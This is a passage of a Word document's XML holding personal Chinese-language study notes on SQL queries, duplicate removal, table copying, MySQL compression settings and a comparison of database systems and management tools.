        <w:t xml:space="preserve">  where s.sno=sc.sno and cno = '1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>--or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select sno,sname from student where not exists(select * from sc where sc.cno='1' and sc.sno=student.sno);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查询选了</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>号课程和</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>号课程的学生的姓名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select sname      </w:t>
      </w:r>
      <w:r>
        <w:t>选了二号课程的人以及</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>号课程的人</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  where sno in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ( select sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      from sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      where cno='2')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">    and sno in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ( select sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      from sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      where cno='3');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">--or </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(select sname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student s, sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='2')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> intersect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(select sname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student s, sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='3');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">--or  </w:t>
      </w:r>
      <w:r>
        <w:t>这个应该是性能最好的，因为只是用了一次联合查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select student.sname from student,sc where sc.cno='2' and student.sno IN (select student.sno from student,sc where student.sno=sc.sno and sc.cno='3') group by student.sno;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>寻找最大平均数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select student.sno from student,sc where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)&gt;=all (select AVG(grade) from sc group by sno) );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">select student.sno from student,sc where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)=(select AVG(grade) from sc group by sno limit 1 order by desc) );   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>寻找指定字段相同的记录：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">select * from Courses group by CourseId,ClassId having count(*)&gt;1;  </w:t>
      </w:r>
      <w:r>
        <w:t>就会将字段相同的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>寻找只有特定字段不同的记录：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">select * from Courses as T1 where  exists (select * from Courses as A  where T1.CourseId=A.CourseId and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining)  </w:t>
      </w:r>
      <w:r>
        <w:t>缺点：我只有</w:t>
      </w:r>
      <w:r>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:t>条记录，使用这个程序以后意味着需要</w:t>
      </w:r>
      <w:r>
        <w:t>8000*8000*n</w:t>
      </w:r>
      <w:r>
        <w:t>次比较，效率是真的低</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>删除的前提其实就是你能够</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>删除重复：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>delete from Courses where  (CourseId,ClassId) in (select CourseId,ClassId    from Courses group by CourseId,ClassId      having count(*) &gt; 1);</w:t>
      </w:r>
      <w:r>
        <w:t>每一次执行就会将重复的内容删除一遍。（但是</w:t>
      </w:r>
      <w:r>
        <w:t>SQLITE</w:t>
      </w:r>
      <w:r>
        <w:t>中执行了类似语句，删除了全部）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>distinct</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新表。像</w:t>
      </w:r>
      <w:r>
        <w:t>sqlite</w:t>
      </w:r>
      <w:r>
        <w:t>这种不支持多个字段同时</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>的，就换这种。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">select distinct count(*) from courses; </w:t>
      </w:r>
      <w:r>
        <w:t>显示的</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>还是原来的</w:t>
      </w:r>
      <w:r>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:t>，先于</w:t>
      </w:r>
      <w:r>
        <w:t>distinct</w:t>
      </w:r>
      <w:r>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">insert into bookmark1 select * from bookmark &lt;=&gt;select * into  bookmark1 from bookmark;   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>复制一个表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>create table bookmark1 as select distinct * from bookmark;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">insert  into Courses_new  select distinct * from Courses;  </w:t>
      </w:r>
      <w:r>
        <w:t>但是字段类型可能会发生自动变化，换成数据库认为应该的类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">create table NewTable as select * from OldTable where 1 &lt;&gt; 1;  </w:t>
      </w:r>
      <w:r>
        <w:t>只创建结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>先已有数据库中新增一个可以表示每一行记录的独特字段：无关性</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>重新创建一个表，然后创建一个序列，把老数据导入新表，删除老表，修改新表名字为老表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>直接在原来表上增加一个字段，创建一个序列，通过更新的方式修改老数据的这个字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>datagrip</w:t>
      </w:r>
      <w:r>
        <w:t>在数据表中增加一个</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>型自增的主键时，会自动填充。新建行的时候，也会自动填充。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">optimise table </w:t>
      </w:r>
      <w:r>
        <w:t>整理了数据库的磁盘碎片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而且提高了效率（</w:t>
      </w:r>
      <w:r>
        <w:t>整理之前，取数据需要跨越很多碎片空间，这时需要时间的，整理后，想要的数据都放在一起了，直接拿就拿到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>树分页的过程中会产生碎片。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>optimize</w:t>
      </w:r>
      <w:r>
        <w:t>最大的问题是锁表，锁表会导致</w:t>
      </w:r>
      <w:r>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>语句堵住</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>压缩：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>字段压缩与表压缩</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">AliSQL </w:t>
      </w:r>
      <w:r>
        <w:t>支持将列的属性设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩，</w:t>
      </w:r>
      <w:r>
        <w:t>那么服务器就会在存入</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>取出这个列的数据时，自动对其进行压缩和解压动作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="500"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>一般支持的还是表压缩：在创建一个压缩表之前，需要启用独立表空间参数</w:t>
      </w:r>
      <w:r>
        <w:t>innodb_file_per_table=1</w:t>
      </w:r>
      <w:r>
        <w:t>；也需要设置</w:t>
      </w:r>
      <w:r>
        <w:t>innodb_file_format=Barracuda</w:t>
      </w:r>
      <w:r>
        <w:t>，你可以写到</w:t>
      </w:r>
      <w:r>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>文件中不需要重启</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>服务。然后</w:t>
      </w:r>
      <w:r>
        <w:t>create table</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alter talble </w:t>
      </w:r>
      <w:r>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROW_FORMAT=COMPRESSED KEY_BLOCK_SIZE=8;(</w:t>
      </w:r>
      <w:r>
        <w:t>默认的</w:t>
      </w:r>
      <w:r>
        <w:t>key_block_size=16)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>记得修改配置文件，不然重启之后写入的数据是未压缩的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:ind w:firstLine="500"/>
      </w:pPr>
      <w:r>
        <w:t>页的大小通过</w:t>
      </w:r>
      <w:r>
        <w:t>KEY_BLOCK_SIZE</w:t>
      </w:r>
      <w:r>
        <w:t>参数指定，经过压缩后，</w:t>
      </w:r>
      <w:r>
        <w:t>8 KB</w:t>
      </w:r>
      <w:r>
        <w:t>的数据页的表要比未压缩的</w:t>
      </w:r>
      <w:r>
        <w:t>16 KB</w:t>
      </w:r>
      <w:r>
        <w:t>的数据页体积小一半，也就是说，存储同样的数据，</w:t>
      </w:r>
      <w:r>
        <w:t>8 KB</w:t>
      </w:r>
      <w:r>
        <w:t>数据页存储的体积要小于</w:t>
      </w:r>
      <w:r>
        <w:t>16 KB</w:t>
      </w:r>
      <w:r>
        <w:t>数据页。但是如果因为你指定的值太小，会产生额外的开销来重组页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>数据库连接池的使用，是对资源上限的设置，程序可以将数据暂时先保存在内存中，并在合适的时间内将数据提交到数据库中，比如</w:t>
      </w:r>
      <w:r>
        <w:t>spark</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>updateStateByKey</w:t>
      </w:r>
      <w:r>
        <w:t>，这么做的最担心的是宕机，要做一个数据的备份。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>内部使用</w:t>
      </w:r>
      <w:r>
        <w:t>B+</w:t>
      </w:r>
      <w:r>
        <w:t>树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>因为这种树深度比其他树都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短，</w:t>
      </w:r>
      <w:r>
        <w:t>同时因为支持同一层节点之间的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，符合</w:t>
      </w:r>
      <w:r>
        <w:t>磁盘预读原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>判断一个数据库的优良性：性能高（不同的场景下面要看不同的性能，单线程的性能还是并发性能，比如说</w:t>
      </w:r>
      <w:r>
        <w:t>sqlite</w:t>
      </w:r>
      <w:r>
        <w:t>并发性能就不行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>；支持每秒钟可以提交的事务次数）、看对语法的支持、其余功能的支持（比如说开源版本的</w:t>
      </w:r>
      <w:r>
        <w:t>SQlite</w:t>
      </w:r>
      <w:r>
        <w:t>不支持加密功能）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库管理工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle SQL Developer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PLSQL Developer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQL Server Management Studio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>navicat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>datagram</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>就有好几款流行的管理工具，例如：</w:t>
      </w:r>
      <w:r>
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>navicat_pgsql</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>phppgsql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>网页后台数据库不能选</w:t>
      </w:r>
      <w:r>
        <w:t>Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>sqlite exprct</w:t>
      </w:r>
      <w:r>
        <w:t>默认会加上</w:t>
      </w:r>
      <w:r>
        <w:t>rowid</w:t>
      </w:r>
      <w:r>
        <w:t>，所以</w:t>
      </w:r>
      <w:r>
        <w:t>select rowid,*  from Courses  where CourseID="101449050" and ClassId="01"</w:t>
      </w:r>
      <w:r>
        <w:t>，就能查看到</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>行数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>rowid</w:t>
      </w:r>
      <w:r>
        <w:t>只有在这个软件中才有效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SQL Server </w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  IDENTITY </w:t>
      </w:r>
      <w:r>
        <w:t>实现自增</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SEQUENCE + </w:t>
      </w:r>
      <w:r>
        <w:t>触发器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>实现自增</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">MySQL </w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AUTO_INCREMENT </w:t>
      </w:r>
      <w:r>
        <w:t>实现自增</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>的分支，因为</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:t>收购而起，完全兼容</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>。其实</w:t>
      </w:r>
      <w:r>
        <w:t>percona</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>都是对于</w:t>
      </w:r>
      <w:r>
        <w:t>innodb</w:t>
      </w:r>
      <w:r>
        <w:t>的改进，</w:t>
      </w:r>
      <w:r>
        <w:t>mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>里边有带了</w:t>
      </w:r>
      <w:r>
        <w:t>percona</w:t>
      </w:r>
      <w:r>
        <w:t>版本的</w:t>
      </w:r>
      <w:r>
        <w:t>xtradb</w:t>
      </w:r>
      <w:r>
        <w:t>，相对来说</w:t>
      </w:r>
      <w:r>
        <w:t>percona</w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>innodb</w:t>
      </w:r>
      <w:r>
        <w:t>方面的改进提升的性能比较明显，</w:t>
      </w:r>
      <w:r>
        <w:t>high performance mysql</w:t>
      </w:r>
      <w:r>
        <w:t>这本书就是</w:t>
      </w:r>
      <w:r>
        <w:t>percona</w:t>
      </w:r>
      <w:r>
        <w:t>团队写的，</w:t>
      </w:r>
      <w:r>
        <w:t>mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>的优势主要是原来的</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>之父创立的，相对来说对于</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>上层的优化比较多点，底层的存储引擎还是</w:t>
      </w:r>
      <w:r>
        <w:t>percona</w:t>
      </w:r>
      <w:r>
        <w:t>的部分。。。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>当然如果对于性能还有更高要求的话，可以考虑用</w:t>
      </w:r>
      <w:r>
        <w:t>tokudb</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>tokudb</w:t>
      </w:r>
      <w:r>
        <w:t>的引擎采用的是分形树结果，效率更牛逼，可惜是收费的。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>侧重磁盘</w:t>
      </w:r>
      <w:r>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:t>最大化，</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>侧重网络</w:t>
      </w:r>
      <w:r>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:t>最大化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Postgresql</w:t>
      </w:r>
      <w:r>
        <w:t>这个数据库有一段时间成为首选数据库（在</w:t>
      </w:r>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:t>被收购以后而</w:t>
      </w:r>
      <w:r>
        <w:t>Mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>还没有获得很好的口碑的时候）。</w:t>
      </w:r>
      <w:r>
        <w:t>Metaspolit</w:t>
      </w:r>
      <w:r>
        <w:t>就是使用这个数据库。数据库操作还是一般的</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>语言就好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">show  engines;   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="009900"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所支持的存储引擎，以及从中得到</w:t>
      </w:r>
